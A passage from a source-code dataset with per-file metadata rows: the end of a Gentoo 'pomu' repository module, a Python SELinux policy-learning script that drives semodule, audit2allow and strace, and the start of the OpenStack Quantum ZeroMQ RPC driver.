name: if not slot or (slot == '0' and not slo) or slot == slo: return self._get_package(category, name, slot or '0') return Result.Err('Package not found') def get_packages(self): with open(path.join(self.pomu_dir, 'world'), 'r') as f: lines = [x.strip() for x in f.readlines() if x.strip() != ''] return lines def portage_repos(): """Yield the repositories configured for portage""" rsets = portage.db[portage.root]['vartree'].settings.repositories for repo in rsets.prepos_order: yield repo def portage_repo_path(repo): """Get the path of a given portage repository (repo)""" rsets = portage.db[portage.root]['vartree'].settings.repositories if repo in rsets.prepos: return rsets.prepos[repo].location return None def pomu_status(repo_path): """Check if pomu is enabled for a repository at a given path (repo_path)""" return path.isdir(path.join(repo_path, 'metadata', 'pomu')) def pomu_active_portage_repo(): """Returns a portage repo, for which pomu is enabled""" for repo in portage_repos(): if pomu_status(portage_repo_path(repo)): return repo return None @cached def pomu_active_repo(no_portage=None, repo_path=None): """Returns a repo for which pomu is enabled""" if no_portage: if not repo_path: return Result.Err('repo-path required') if pomu_status(repo_path): return Result.Ok(Repository(repo_path)) return Result.Err('pomu is not initialized') else: repo = pomu_active_portage_repo() if repo: return Result.Ok(Repository(portage_repo_path(repo), repo)) return Result.Err('pomu is not initialized') class MergedPackage(Package): @property def pkgdir(self): ret = path.join(self.root, 'metadata', 'pomu', self.category, self.name) if self.slot != '0': ret = path.join(ret, self.slot) return ret def patch(self, patch): if isinstance(patch, list): for x in patch: self.patch(x) return Result.Ok() ps = PatchSet() ps.parse(open(patch, 'r')) ps.apply(root=self.root) self.add_patch(patch) return Result.Ok() @property def patch_list(self): with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'r') as f: lines = [x.strip() for x in f.readlines() if x.strip() != ''] return lines def add_patch(self, patch, name=None): # patch is a path, unless name is passed patch_dir = path.join(self.pkgdir, 'patches') makedirs(patch_dir, exist_ok=True) if name is None: copy2(patch, patch_dir) with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f: f.write(path.basename(patch) + '\n') else: with open(path.join(patch_dir, name), 'w') as f: f.write(patch) with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f: f.write(name + '\n')
gpl-2.0
5,766,960,781,250,393,000
38.07438
167
0.579315
false
3.702428
false
false
false
Siosm/contextd-capture
piga-systrans/selaudit/selaudit.py
2
25513
#!/usr/bin/python3 # -*- coding: utf-8 -*- # Configuration # Templates basepolname = 'template/module' base_transpol_name = 'template/temp_transition' makefile_path = 'template/Makefile' # Default value for the template variables user_u_default = 'user_u' user_r_default = 'user_r' user_t_default = 'user_t' module_domain_t_default_pattern = 'user_%modulename%_t' module_exec_t_default_pattern = '%modulename%_exec_t' module_tmp_domain_t_default_pattern = '%modulename%_tmp_t' module_log_domain_t_default_pattern = '%modulename%_log_t' # Selpolgen user selpolgen_u_default = 'root' selpolgen_r_default = 'sysadm_r' selpolgen_t_default = 'sysadm_t' # Programs fullpath semodule_path = '/usr/sbin/semodule' make_path = '/usr/bin/make' setfilecon_path = '/usr/sbin/setfilecon' runcon_path = '/usr/bin/runcon' audit2allow_path = '/usr/bin/audit2allow' dmesg_path = '/bin/dmesg' strace_path = '/usr/bin/strace' ls_path = '/bin/ls' setfiles_path = '/sbin/setfiles' # /Configuration # Import import getopt import re, string, sys import os, signal import glob import subprocess import shutil import time from pigi import * # Global variables verbosity = 0 wantToAbort = False # functions def log(priority, msg): if priority <= verbosity: print(msg) def handler(signum, frame): global wantToAbort wantToAbort = True def mkdir_p(path): if not os.path.exists (path): os.makedirs (path) def getPolicyPath(module_name, extension=''): if len(extension) > 0: return "policies/%s/%s.%s" % (module_name, module_name, extension) else: return "policies/%s/" % module_name def getTempModuleTransitionPath(module_name, extension=''): if len(extension) > 0: return "temp/%s/%s.%s" % (module_name, module_name, extension) else: return "temp/%s/" % module_name def loadSELinuxModule(module_path_pp): proc = subprocess.Popen([semodule_path, '-i', module_path_pp], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = proc.communicate() if proc.returncode != 0: print("----\nError while loading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_path_pp, stdout, stderr), file=sys.stderr) return False else: return True def unloadSELinuxModule(module_name): proc = subprocess.Popen([semodule_path, '-r', module_name], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = proc.communicate() if proc.returncode != 0: print("----\nError while unloading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_name, stdout, stderr), file=sys.stderr) return False else: return True def reloadSELinuxModule(module_name): if unloadSELinuxModule(module_name): if loadSELinuxModule(getPolicyPath(module_name, "pp")): return True else: return False else: return False def compileAndLoadSELinuxModule(module_dir): proc = subprocess.Popen([make_path, 'load'], cwd=module_dir, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = proc.communicate() if proc.returncode != 0: print("----\nError while compiling and loading the module at '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_dir, stdout, stderr), file=sys.stderr) return False else: return True def generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, permissive_mode=False): #TODO add exceptions handling. It's fine for the moment as these exceptions are fatal for the program # Get the template template_te = open("%s.te" % basepolname, "r").read() template_if = open("%s.if" % basepolname, "r").read() template_fc = open("%s.fc" % basepolname, "r").read() if len(template_te) == 0: return '' if permissive_mode: template_te += "permissive ${module_domain_t};" # Replace the template variables by our values dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_tmp_domain_t": module_tmp_domain_t, "module_log_domain_t": module_log_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t}) for key in dico.keys(): template_te=template_te.replace("${%s}" % key, dico[key]) template_if=template_if.replace("${%s}" % key, dico[key]) template_fc=template_fc.replace("${%s}" % key, dico[key]) # Create a directory for the output module mkdir_p(getPolicyPath(module_name, "")) # write the output module there file_te = open(getPolicyPath(module_name, "te"), "w").write(template_te) file_if = open(getPolicyPath(module_name, "if"), "w").write(template_if) file_fc = open(getPolicyPath(module_name, "fc"), "w").write(template_fc) # Copy the Makefile shutil.copyfile(makefile_path, "%sMakefile" % getPolicyPath(module_name, "")) return getPolicyPath(module_name) def generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t): #TODO add exceptions handling. It's fine for the moment as these exceptions are fatal for the program module_name = "selpolgen-%s" % module_name # Get the template template_te = open("%s.te" % base_transpol_name, "r").read() template_if = open("%s.if" % base_transpol_name, "r").read() template_fc = open("%s.fc" % base_transpol_name, "r").read() if len(template_te) == 0: return '' # Replace the template variables by our values dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t}) for key in dico.keys(): template_te=template_te.replace("${%s}" % key, dico[key]) template_if=template_if.replace("${%s}" % key, dico[key]) template_fc=template_fc.replace("${%s}" % key, dico[key]) # Remove the directory for the output module try: shutil.rmtree(getTempModuleTransitionPath(module_name, "")) except: pass # Create a directory for the output module mkdir_p(getTempModuleTransitionPath(module_name, "")) # write the output module there file_te = open(getTempModuleTransitionPath(module_name, "te"), "w").write(template_te) file_if = open(getTempModuleTransitionPath(module_name, "if"), "w").write(template_if) file_fc = open(getTempModuleTransitionPath(module_name, "fc"), "w").write(template_fc) # Copy the Makefile shutil.copyfile(makefile_path, "%sMakefile" % getTempModuleTransitionPath(module_name, "")) return getTempModuleTransitionPath(module_name) def setFileSELinuxContext(user_u, role_r, type_t, filepath): context = '%s:%s:%s' % (user_u, role_r, type_t) proc = subprocess.Popen([setfilecon_path, context, filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = proc.communicate() if proc.returncode != 0: print("Error while setting the context %s to the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (context, filepath, stdout, stderr), file=sys.stderr) return False else: return True def getAudit2AllowRules(domain_t): rules = [] proc = subprocess.Popen([audit2allow_path, "-d"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = proc.communicate() if proc.returncode != 0: print("Error while auditing:\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (stdout, stderr), file=sys.stderr) return rules lines=stdout.splitlines() log(2, "audit2allow output (%i lines) is: '%s'" % (len(lines), stdout)) store=False for line in lines: line = line.decode() log(2, "line[:10] = '%s'" % (line[:10])) if line[:10] == "#=========": fields=line.split(" ") if fields[1] == domain_t: store = True else: store = False else: if store and len(line)>0: rules.append(line); return rules def regeneratePolicy(policy_path, rules, permissive_domains = list()): # Add the lines to the policy template_te = open(policy_path, "a"); #template_te.writelines(rules) for line in rules: template_te.write(line+"\n") template_te.close() # Parse it scanner = SELinuxScanner() parser = SELinuxParser(scanner) te_file = open(policy_path, "r") tokens = parser.parse(te_file.read()) te_file.close() # Store it optimized optimizer = SELinuxOptimizer(tokens) optimizer.selfize_rules() optimizer.factorize_rules() optimizer.factorize_rule_attributes() optimizer.sort_rules() optimizer.to_file(policy_path, permissive_domains) def updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=False): log(1, "Read the audit2allow output") rules = getAudit2AllowRules(module_domain_t) if forceReload or len(rules) > 0: log(0, "Add %i rules to %s and reload the policy" % (len(rules), getPolicyPath(module_name, "te"))) if not enforcingMode: permissive_domains = [module_domain_t] else: permissive_domains = list() regeneratePolicy(getPolicyPath(module_name, "te"), rules, permissive_domains) # empty the logs dmesg = subprocess.Popen([dmesg_path, '-c'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) dmesg.communicate() # Load the new policy compileAndLoadSELinuxModule(getPolicyPath(module_name, "")) return len(rules) def runApp(module_name, app_path, useStrace=False): if useStrace and os.path.exists(strace_path): print("Launch the application and trace it with strace") proc = subprocess.Popen([strace_path, '-e' 'trace=open,execve,mkdir', '-o', "%sstrace" % getTempModuleTransitionPath("selpolgen-%s" % module_name, ""), '-ff', '-F', app_path]) else: print("Launch the application") proc = subprocess.Popen([app_path]) # get the pid curPID = proc.pid return proc def askToRunApp(app_path, domain_t, audit_fc=False): deleteFileList(["/tmp/selinux-audit"]) print("\n****** Entering the auditing loop ******") if audit_fc: print("The application you are auditing will first be launched in a permissive mode, be sure to use all the functionnalities before quitting it.\n") print("Please launch this command in the domain %s: %s" % (domain_t, "selaudit_user.sh %s" % app_path)) def getFileCon(filepath): proc = subprocess.Popen([ls_path, '-Z', filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = proc.communicate() if proc.returncode != 0: # print("Error while getting the context of the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (filepath, stdout, stderr), file=sys.stderr) return "<Context not found>" fields = str(stdout, "utf-8").split(' ') log(2, "getFileCon('%s') = '%s'" % (filepath, fields[0])) return fields[0] def deleteFileList(to_be_deleted): for f in to_be_deleted: try: if os.path.isfile(f) or os.path.islink(f): os.remove(f) elif os.path.isdir(f): shutil.rmtree(f) except Exception as inst: print("deleteFileList: Caught exception %s: %s" % (type(inst), inst)) pass def escape_re(re): re = re.replace(".", "\\."); re = re.replace("(", "\\)"); re = re.replace(")", "\\)"); re = re.replace("|", "\\|"); re = re.replace("^", "\\^"); re = re.replace("*", "\\*"); re = re.replace("+", "\\+"); re = re.replace("?", "\\?"); return re def auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=True): # dir_path = getTempModuleTransitionPath("selpolgen-%s" % module_name, "") execves = dict() mkdirs = dict() opens = dict() libs = dict() shms = dict() failed = list() to_be_deleted = list() # Read all the logs log_files = glob.glob("%s/strace*" % dir_path) for log in log_files: f = open(log, "r") for line in f: m = re.match(r"(?P<function>\w+) *\((?P<params>.*)\) *= *(?P<result>.*)", line) if m: args = m.group('params').split(', ') if not m.group('result').startswith("-1"): line = "%s(%s)" % (m.group('function'), ','.join(args)) m2 = re.match(r"\"(.*)\"", args[0]) if m2: filepath = m2.group(1) if m.group('function') == "open": if args[1].find('O_CREAT') != -1 or args[1].find('O_WRONLY') != -1: to_be_deleted.append(filepath) # Is the file a standard library ? stdlib = re.match(r"/(usr/)?lib/[^/]+", filepath) if filepath.startswith('/dev/shm'): if filepath not in shms: shms[filepath] = list() if line not in shms[filepath]: shms[filepath].append(line) elif stdlib: if filepath not in opens: libs[filepath] = list() if line not in libs[filepath]: libs[filepath].append(line) else: if filepath not in opens: opens[filepath] = list() if line not in opens[filepath]: opens[filepath].append(line) elif m.group('function') == "mkdir": if filepath not in mkdirs: mkdirs[filepath] = list() if line not in mkdirs[filepath]: mkdirs[filepath].append(line) to_be_deleted.append(filepath) elif m.group('function') == "execve": if filepath not in execves: execves[filepath] = list() if line not in execves[filepath]: execves[filepath].append(line) else: line = "%s(%s)" % (m.group('function'), ','.join(args)) f.close() # Delete all the strace files deleteFileList(log_files); if saveResults: # We have the logs, sorted by type and by path, generate the output file fc_file = open(getPolicyPath(module_name, "fc"), "a") fc_file.write("\n\n\n# **** Mkdir ****\n") mkdir_keys = mkdirs.keys() for dir_path in sorted(mkdir_keys): # Write all the interactions with this file for call in mkdirs[dir_path]: fc_file.write("# %s\n" % call) # Propose a rule fc_file.write("#%s/(.*/)? %s\n\n" % (escape_re(dir_path), getFileCon(dir_path))) fc_file.write("\n\n\n# **** Execve ****\n") execve_keys = execves.keys() for exe_path in sorted(execve_keys): # Write all the interactions with this file for call in execves[exe_path]: fc_file.write("# %s\n" % call) # Propose a rule fc_file.write("#%s -- %s\n\n" % (escape_re(exe_path), getFileCon(exe_path))) fc_file.write("\n\n\n# **** Open ****\n") open_keys = opens.keys() for open_path in sorted(open_keys): # Write all the interactions with this file for call in opens[open_path]: fc_file.write("# %s\n" % call) # Propose a rule fc_file.write("#%s -- %s\n\n" % (escape_re(open_path), getFileCon(open_path))) fc_file.write("\n\n\n# **** Standard libraries ****\n") libs_keys = libs.keys() for lib_path in sorted(libs_keys): # Write all the interactions with this file for call in libs[lib_path]: fc_file.write("# %s\n" % call) # Propose a rule fc_file.write("#%s -- %s\n\n" % (escape_re(lib_path), getFileCon(lib_path))) fc_file.write("\n\n\n# **** SHM ****\n") shms_keys = shms.keys() for shm_path in sorted(shms_keys): # Write all the interactions with this file for call in shms[shm_path]: fc_file.write("# %s\n" % call) # Propose a rule fc_file.write("#%s -- %s\n\n" % (escape_re(shm_path), getFileCon(shm_path))) # Delete all the created files deleteFileList(to_be_deleted); def parseFCFile(policy_fc): # Read the fc policy if not os.path.exists(policy_fc): return set(), "The fc policy file %s doesn't exist\n" % policy_fc fc_policy_file = open("%s" % policy_fc, "r") # split the fc policy file fc_policies = [] for line in fc_policy_file: m = re.match(r"\s*(?P<comment>#)?(?P<path>\\?/\S+)\s+(?P<type>\S+)?\s+(?P<context>\S+)", line) if m: pol = dict() pol['path'] = m.groupdict()['path'] pol['type'] = m.groupdict()['type'] pol['context'] = m.groupdict()['context'] pol['commented'] = m.groupdict()['comment']=="#" if (pol['type'] == None): pol['type'] = '' #print("Found rule: comment = '%s' path='%s', type='%s', context='%s'" % (pol['commented'], pol['path'], pol['type'], pol['context'])) fc_policies.append(pol) return fc_policies def addFCContextsToTE(policy_fc, policy_te): # Read the te policy if not os.path.exists(policy_te): return set(), "The te policy file %s doesn't exist\n" % policy_fc te_policy_file = open("%s" % policy_te, "a") fc_policies = parseFCFile(policy_fc) for policy in fc_policies: if not policy['commented']: print("got context %s\n" % policy['context']) te_policy_file.write("type %s;\nfiles_type(%s);\n" % (policy['context'], policy['context'])) te_policy_file.close() def editFiles(filepathes): editor_path = os.getenv('EDITOR') if not editor_path: print('The $EDITOR environement variable is not set.\nWhich editor would you like to use ?') editor = input('') os.environ['EDITOR'] = editor params = [editor_path] params.extend(filepathes) proc = subprocess.Popen(params) proc.communicate() return proc.returncode == 0 def willingToQuit(): print("\nThe system is currently learning a SELinux security policy.") print("Deciding to stop it now means you have successfully tested all the functionnalities of the software you are auditing.") print("\nAre you sure you want to stop it ? (y/N)") answer=input('') if answer in ('y', 'Y', 'Yes', 'yes'): return True else: return False def startAuditing(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse): # Re-route signals to the launched process signal.signal(signal.SIGINT, handler) signal.signal(signal.SIGTERM, handler) signal.signal(signal.SIGHUP, handler) global wantToAbort wantToAbort = False if not reuse: # Get a base policy and load it print("Generate the base policy and load it") base_policy=generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc) if not compileAndLoadSELinuxModule(base_policy): return False else: if not os.path.exists(getPolicyPath(module_name, "te")): print("The module %s doesn't exist." % module_name) return # Create a policy for selpolgen.py so as when it launches the audited program, the audited program will transit to the right domain print("Generate the sysadm policy to launch the application in the right context") temp_policy=generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t) if not compileAndLoadSELinuxModule(temp_policy): return False # Set the app context on the disc print("Set the application file's new context") setFileSELinuxContext("system_u", "object_r", module_exec_t, app_path) # run the application askToRunApp(app_path, user_t, audit_fc); if audit_fc: isRunning = True while isRunning : if wantToAbort: if willingToQuit(): sys.exit(0) else: wantToAbort = False time.sleep(0.1) # remove the lock if the file exists if os.path.exists("/tmp/selinux-audit/lock"): isRunning = False # Propose some file constraints print("Update the fc file, this may take a while"); auditStraceLogs(module_name) # Regenerate the policy updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=True) # let the application start again os.remove("/tmp/selinux-audit/lock") print("FC Labelling done\n") print("Start the TE learning loop") # learning loop nbRulesAddedSinceLastExecution = 0 execStart = time.time() zeroRuleLoopCount = 0 while True: if wantToAbort: if willingToQuit(): break else: wantToAbort = False time.sleep(0.1) nbRulesAddedSinceLastExecution += updateAndReloadRules(module_name, module_domain_t) # remove the lock if the file exists if os.path.exists("/tmp/selinux-audit/lock"): if nbRulesAddedSinceLastExecution > 0: auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=False) zeroRuleLoopCount = 0 elif time.time()-execStart > 2.0 or zeroRuleLoopCount > 5: print("\n**********\nNo rules have been added during the execution of this audit instance.") print("Have you tested every use case allowed for the application ? (y/N)") answer=input('') print("**********") if answer in ('y', 'Y', 'Yes', 'yes'): break zeroRuleLoopCount = 0 else: zeroRuleLoopCount = zeroRuleLoopCount + 1 print("The instance didn't generate any rules but carry on nevertheless (%s/5)" % zeroRuleLoopCount) nbRulesAddedSinceLastExecution = 0 execStart = time.time() os.remove("/tmp/selinux-audit/lock"); print("\nThe final policy can be found at %s" % getPolicyPath(module_name, "")) class Usage(Exception): def __init__(self, msg): Exception.__init__(self) self.msg = msg def show_help(): print("Help:\n") print("-h or --help : This help message") print("-m or --module : The name of the SELinux module you would like to create (mandatory)") print("-u or --user_u : The SELinux user who will execute the application") print("-r or --user_r : The SELinux role who will execute the application") print("-t or --user_t : The SELinux type who will execute the application") print("-d or --module_domain_t : The domain in which the audited application will be executed") print("-e or --module_exec_t : The file label that will be given to the application") print("-t or --module_tmp_domain_t : The file label that will be given to the application's tmp files") print("-l or --module_log_domain_t : The file label that will be given to the application's log files") print("-f or --no_fc_pass : Do not fill the fc file. Learning the policy will take one iteration less") print("-p or --reuse_policy : Re-use a pre-existing policy and learn what's new") def main(argv=None): if argv is None: argv = sys.argv cwd = os.path.dirname(os.path.realpath(argv[0])) + '/' os.chdir(cwd) try: # Check the given parameter names and get their values try: opts, args = getopt.getopt(argv[1:], "hvm:u:r:t:d:e:t:l:fp", ["help", "verbose", "module=", "user_u=", "user_r=", "user_t=", "module_domain_t=", "module_exec_t=", "module_tmp_domain_t=", "module_log_domain_t=", "no_fc_pass", "reuse_policy"]) except(getopt.error) as msg: print("Argument parsing error: %s" % msg) raise Usage(msg) # Params module_name = '' module_domain_t = '' module_exec_t = '' module_tmp_domain_t = '' module_log_domain_t = '' audit_fc = True app_fullpath = '' user_u = user_u_default user_r = user_r_default user_t = user_t_default reuse = False # Get the parameters for opt, arg in opts: if opt in ("-h", "--help"): show_help() return 0 elif opt in ("-v", "--verbose"): verbosity += 1 elif opt in ("-m", "--module"): module_name = arg elif opt in ("-u", "--user_u"): user_u = arg elif opt in ("-r", "--user_r"): user_r = arg elif opt in ("-t", "--user_t"): user_t = arg elif opt in ("-e", "--module_exec_t"): module_exec_t = arg elif opt in ("-d", "--module_domain_t"): module_domain_t = arg elif opt in ("-t", "--module_tmp_domain_t"): module_tmp_domain_t = arg elif opt in ("-l", "--module_log_domain_t"): module_log_domain_t = arg elif opt in ("-f", "--no_fc_pass"): audit_fc = False elif opt in ("-p", "--reuse_policy"): reuse = True # if there are no args left, then an error happened if len(args) == 0 or module_name == '': print('Usage: %s [options] -m module_name filepath' % sys.argv[0], file=sys.stderr) else: # Get the fullpath app_fullpath = args[len(args)-1] # Set the default value for module_domain_t & module_exec_t if there were not set by the user if module_domain_t == '': module_domain_t = module_domain_t_default_pattern.replace("%modulename%", module_name) if module_exec_t == '': module_exec_t = module_exec_t_default_pattern.replace("%modulename%", module_name) if module_tmp_domain_t == '': module_tmp_domain_t = module_tmp_domain_t_default_pattern.replace("%modulename%", module_name) if module_log_domain_t == '': module_log_domain_t = module_log_domain_t_default_pattern.replace("%modulename%", module_name) # Let's recap to the user what he has chosen. print('You are about to create a SELinux module for the application') print('') print('Here is the summary of how it will be created:') print(' Module name (-m): %s' % module_name) print(' Application path: \'%s\'' % app_fullpath) print(' Will be labelled as ():():(-e):%s:%s:%s' % ('system_u', 'object_r', module_exec_t)) print(' Be executed by (-u):(-r):(-t): %s:%s:%s' % (user_u, user_r, user_t)) print(' Jailed in the domain (-d): %s' % module_domain_t) print(' Tmp file\'s domain is (-t): %s' % module_tmp_domain_t) print(' Log file\'s domain is (-l): %s' % module_log_domain_t) print(' Do not audit the fc file (bad practice!) (-f): %s' % (not audit_fc)) print(' Re-use an existing policy (-p): %s' % (reuse)) print('') print('Do you agree with that ? (Y/n)') answer=input('') if answer in ('', 'y', 'Y', 'Yes', 'yes'): startAuditing(module_name, app_fullpath, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse) else: return 0 except(Usage) as err: print('%s: %s' % (sys.argv[0], err.msg), file=sys.stderr) print('For a list of available options, use "%s --help"'\ % sys.argv[0], file=sys.stderr) return -1 if __name__ == '__main__': main()
gpl-3.0
-7,108,910,309,036,765,000
32.52431
267
0.65428
false
2.978286
false
false
false
rossella/neutron
quantum/openstack/common/rpc/impl_zmq.py
1
25519
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2011 Cloudscaling Group, Inc # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import pprint import socket import string import sys import types import uuid import eventlet import greenlet from quantum.openstack.common import cfg from quantum.openstack.common.gettextutils import _ from quantum.openstack.common import importutils from quantum.openstack.common import jsonutils from quantum.openstack.common import processutils as utils from quantum.openstack.common.rpc import common as rpc_common zmq = importutils.try_import('eventlet.green.zmq') # for convenience, are not modified. pformat = pprint.pformat Timeout = eventlet.timeout.Timeout LOG = rpc_common.LOG RemoteError = rpc_common.RemoteError RPCException = rpc_common.RPCException zmq_opts = [ cfg.StrOpt('rpc_zmq_bind_address', default='*', help='ZeroMQ bind address. Should be a wildcard (*), ' 'an ethernet interface, or IP. ' 'The "host" option should point or resolve to this ' 'address.'), # The module.Class to use for matchmaking. cfg.StrOpt( 'rpc_zmq_matchmaker', default=('quantum.openstack.common.rpc.' 'matchmaker.MatchMakerLocalhost'), help='MatchMaker driver', ), # The following port is unassigned by IANA as of 2012-05-21 cfg.IntOpt('rpc_zmq_port', default=9501, help='ZeroMQ receiver listening port'), cfg.IntOpt('rpc_zmq_contexts', default=1, help='Number of ZeroMQ contexts, defaults to 1'), cfg.IntOpt('rpc_zmq_topic_backlog', default=None, help='Maximum number of ingress messages to locally buffer ' 'per topic. Default is unlimited.'), cfg.StrOpt('rpc_zmq_ipc_dir', default='/var/run/openstack', help='Directory for holding IPC sockets'), cfg.StrOpt('rpc_zmq_host', default=socket.gethostname(), help='Name of this node. Must be a valid hostname, FQDN, or ' 'IP address. Must match "host" option, if running Nova.') ] CONF = cfg.CONF CONF.register_opts(zmq_opts) ZMQ_CTX = None # ZeroMQ Context, must be global. matchmaker = None # memoized matchmaker object def _serialize(data): """ Serialization wrapper We prefer using JSON, but it cannot encode all types. Error if a developer passes us bad data. """ try: return str(jsonutils.dumps(data, ensure_ascii=True)) except TypeError: LOG.error(_("JSON serialization failed.")) raise def _deserialize(data): """ Deserialization wrapper """ LOG.debug(_("Deserializing: %s"), data) return jsonutils.loads(data) class ZmqSocket(object): """ A tiny wrapper around ZeroMQ to simplify the send/recv protocol and connection management. Can be used as a Context (supports the 'with' statement). """ def __init__(self, addr, zmq_type, bind=True, subscribe=None): self.sock = _get_ctxt().socket(zmq_type) self.addr = addr self.type = zmq_type self.subscriptions = [] # Support failures on sending/receiving on wrong socket type. self.can_recv = zmq_type in (zmq.PULL, zmq.SUB) self.can_send = zmq_type in (zmq.PUSH, zmq.PUB) self.can_sub = zmq_type in (zmq.SUB, ) # Support list, str, & None for subscribe arg (cast to list) do_sub = { list: subscribe, str: [subscribe], type(None): [] }[type(subscribe)] for f in do_sub: self.subscribe(f) str_data = {'addr': addr, 'type': self.socket_s(), 'subscribe': subscribe, 'bind': bind} LOG.debug(_("Connecting to %(addr)s with %(type)s"), str_data) LOG.debug(_("-> Subscribed to %(subscribe)s"), str_data) LOG.debug(_("-> bind: %(bind)s"), str_data) try: if bind: self.sock.bind(addr) else: self.sock.connect(addr) except Exception: raise RPCException(_("Could not open socket.")) def socket_s(self): """Get socket type as string.""" t_enum = ('PUSH', 'PULL', 'PUB', 'SUB', 'REP', 'REQ', 'ROUTER', 'DEALER') return dict(map(lambda t: (getattr(zmq, t), t), t_enum))[self.type] def subscribe(self, msg_filter): """Subscribe.""" if not self.can_sub: raise RPCException("Cannot subscribe on this socket.") LOG.debug(_("Subscribing to %s"), msg_filter) try: self.sock.setsockopt(zmq.SUBSCRIBE, msg_filter) except Exception: return self.subscriptions.append(msg_filter) def unsubscribe(self, msg_filter): """Unsubscribe.""" if msg_filter not in self.subscriptions: return self.sock.setsockopt(zmq.UNSUBSCRIBE, msg_filter) self.subscriptions.remove(msg_filter) def close(self): if self.sock is None or self.sock.closed: return # We must unsubscribe, or we'll leak descriptors. if len(self.subscriptions) > 0: for f in self.subscriptions: try: self.sock.setsockopt(zmq.UNSUBSCRIBE, f) except Exception: pass self.subscriptions = [] try: # Default is to linger self.sock.close() except Exception: # While this is a bad thing to happen, # it would be much worse if some of the code calling this # were to fail. For now, lets log, and later evaluate # if we can safely raise here. LOG.error("ZeroMQ socket could not be closed.") self.sock = None def recv(self): if not self.can_recv: raise RPCException(_("You cannot recv on this socket.")) return self.sock.recv_multipart() def send(self, data): if not self.can_send: raise RPCException(_("You cannot send on this socket.")) self.sock.send_multipart(data) class ZmqClient(object): """Client for ZMQ sockets.""" def __init__(self, addr, socket_type=None, bind=False): if socket_type is None: socket_type = zmq.PUSH self.outq = ZmqSocket(addr, socket_type, bind=bind) def cast(self, msg_id, topic, data, serialize=True, force_envelope=False): if serialize: data = rpc_common.serialize_msg(data, force_envelope) self.outq.send([str(msg_id), str(topic), str('cast'), _serialize(data)]) def close(self): self.outq.close() class RpcContext(rpc_common.CommonRpcContext): """Context that supports replying to a rpc.call.""" def __init__(self, **kwargs): self.replies = [] super(RpcContext, self).__init__(**kwargs) def deepcopy(self): values = self.to_dict() values['replies'] = self.replies return self.__class__(**values) def reply(self, reply=None, failure=None, ending=False): if ending: return self.replies.append(reply) @classmethod def marshal(self, ctx): ctx_data = ctx.to_dict() return _serialize(ctx_data) @classmethod def unmarshal(self, data): return RpcContext.from_dict(_deserialize(data)) class InternalContext(object): """Used by ConsumerBase as a private context for - methods.""" def __init__(self, proxy): self.proxy = proxy self.msg_waiter = None def _get_response(self, ctx, proxy, topic, data): """Process a curried message and cast the result to topic.""" LOG.debug(_("Running func with context: %s"), ctx.to_dict()) data.setdefault('version', None) data.setdefault('args', {}) try: result = proxy.dispatch( ctx, data['version'], data['method'], **data['args']) return ConsumerBase.normalize_reply(result, ctx.replies) except greenlet.GreenletExit: # ignore these since they are just from shutdowns pass except rpc_common.ClientException, e: LOG.debug(_("Expected exception during message handling (%s)") % e._exc_info[1]) return {'exc': rpc_common.serialize_remote_exception(e._exc_info, log_failure=False)} except Exception: LOG.error(_("Exception during message handling")) return {'exc': rpc_common.serialize_remote_exception(sys.exc_info())} def reply(self, ctx, proxy, msg_id=None, context=None, topic=None, msg=None): """Reply to a casted call.""" # Our real method is curried into msg['args'] child_ctx = RpcContext.unmarshal(msg[0]) response = ConsumerBase.normalize_reply( self._get_response(child_ctx, proxy, topic, msg[1]), ctx.replies) LOG.debug(_("Sending reply")) cast(CONF, ctx, topic, { 'method': '-process_reply', 'args': { 'msg_id': msg_id, 'response': response } }) class ConsumerBase(object): """Base Consumer.""" def __init__(self): self.private_ctx = InternalContext(None) @classmethod def normalize_reply(self, result, replies): #TODO(ewindisch): re-evaluate and document this method. if isinstance(result, types.GeneratorType): return list(result) elif replies: return replies else: return [result] def process(self, style, target, proxy, ctx, data): # Method starting with - are # processed internally. (non-valid method name) method = data['method'] # Internal method # uses internal context for safety. if data['method'][0] == '-': # For reply / process_reply method = method[1:] if method == 'reply': 